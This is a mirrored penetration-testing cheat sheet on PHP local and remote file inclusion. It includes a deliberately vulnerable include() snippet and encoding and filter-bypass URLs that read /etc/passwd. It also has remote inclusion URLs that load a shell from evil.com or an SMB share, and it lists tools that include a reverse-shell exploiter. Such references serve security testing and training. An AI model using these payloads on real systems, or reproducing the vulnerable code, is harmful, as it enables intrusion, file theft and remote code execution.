index.md (6990B)
1 --- 2 title: "File Inclusion" 3 topic: "File Inclusion" 4 topicSlug: "file-inclusion" 5 sourcePath: "File Inclusion/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/File%20Inclusion/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # File Inclusion 12 13 > A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement. 14 15 ## Summary 16 17 - [Tools](#tools) 18 - [Local File Inclusion](#local-file-inclusion) 19 - [Null Byte](#null-byte) 20 - [Double Encoding](#double-encoding) 21 - [UTF-8 Encoding](#utf-8-encoding) 22 - [Path Truncation](#path-truncation) 23 - [Filter Bypass](#filter-bypass) 24 - [Remote File Inclusion](#remote-file-inclusion) 25 - [Null Byte](#null-byte-1) 26 - [Double Encoding](#double-encoding-1) 27 - [Bypass allow_url_include](#bypass-allow_url_include) 28 - [Labs](#labs) 29 - [References](#references) 30 31 ## Tools 32 33 - [P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) (archived on Oct 7, 2020) - kadimus is a tool to check and exploit lfi vulnerability. 34 - [D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner 35 - [kurobeats/fimap](https://github.com/kurobeats/fimap) - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. 36 - [lightos/Panoptic](https://github.com/lightos/Panoptic) - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities. 37 - [hansmach1ne/LFImap](https://github.com/hansmach1ne/LFImap) - Local File Inclusion discovery and exploitation tool 38 39 ## Local File Inclusion 40 41 **File Inclusion Vulnerability** should be differentiated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code. 42 43 Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution. 44 45 ```php 46 <?php 47 $file = $_GET['page']; 48 include($file); 49 ?> 50 ``` 51 52 In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files. 53 54 ```powershell 55 http://example.com/index.php?page=../../../etc/passwd 56 ``` 57 58 ### Null Byte 59 60 :warning: In versions of PHP below 5.3.4 we can terminate with null byte (`%00`). 61 62 ```powershell 63 http://example.com/index.php?page=../../../etc/passwd%00 64 ``` 65 66 **Example**: Joomla! Component Web TV 1.0 - CVE-2010-1470 67 68 ```ps1 69 {{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 70 ``` 71 72 ### Double Encoding 73 74 ```powershell 75 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd 76 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 77 ``` 78 79 ### UTF-8 Encoding 80 81 ```powershell 82 http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 83 http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 84 ``` 85 86 ### Path Truncation 87 88 On most PHP installations a filename longer than `4096` bytes will be cut off so any excess chars will be thrown away. 89 90 ```powershell 91 http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] 92 http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] 93 http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 94 http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd 95 ``` 96 97 ### Filter Bypass 98 99 ```powershell 100 http://example.com/index.php?page=....//....//etc/passwd 101 http://example.com/index.php?page=..///////..////..//////etc/passwd 102 http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd 103 ``` 104 105 ## Remote File Inclusion 106 107 > Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input. 108 109 Remote File Inclusion doesn't work anymore on a default configuration since `allow_url_include` is now disabled since PHP 5. 110 111 ```ini 112 allow_url_include = On 113 ``` 114 115 Most of the filter bypasses from LFI section can be reused for RFI. 116 117 ```powershell 118 http://example.com/index.php?page=http://evil.com/shell.txt 119 ``` 120 121 ### Null Byte 122 123 ```powershell 124 http://example.com/index.php?page=http://evil.com/shell.txt%00 125 ``` 126 127 ### Double Encoding 128 129 ```powershell 130 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt 131 ``` 132 133 ### Bypass allow_url_include 134 135 When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. 136 137 1. Create a share open to everyone 138 2. Write a PHP code inside a file : `shell.php` 139 3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` 140 141 ## Labs 142 143 - [Root Me - Local File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion) 144 - [Root Me - Local File Inclusion - Double encoding](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding) 145 - [Root Me - Remote File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion) 146 - [Root Me - PHP - Filters](https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters) 147 148 ## References 149 150 - [CVV #1: Local File Inclusion - SI9INT - June 20, 2018](https://web.archive.org/web/20200724150218/https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) 151 - [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - May 12, 2019](https://web.archive.org/web/20260220172333/https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html) 152 - [Is PHP vulnerable and under what conditions? - Andreas Venieris - April 13, 2015](https://web.archive.org/web/20250209181954/http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html) 153 - [LFI Cheat Sheet - @Arr0way - April 24, 2016](https://web.archive.org/web/20180121083456/https://highon.coffee/blog/lfi-cheat-sheet/) 154 - [Testing for Local File Inclusion - OWASP - June 25, 2017](https://web.archive.org/web/20131021005706/https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) 155 - [Turning LFI into RFI - Grayson Christopher - August 14, 2017](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)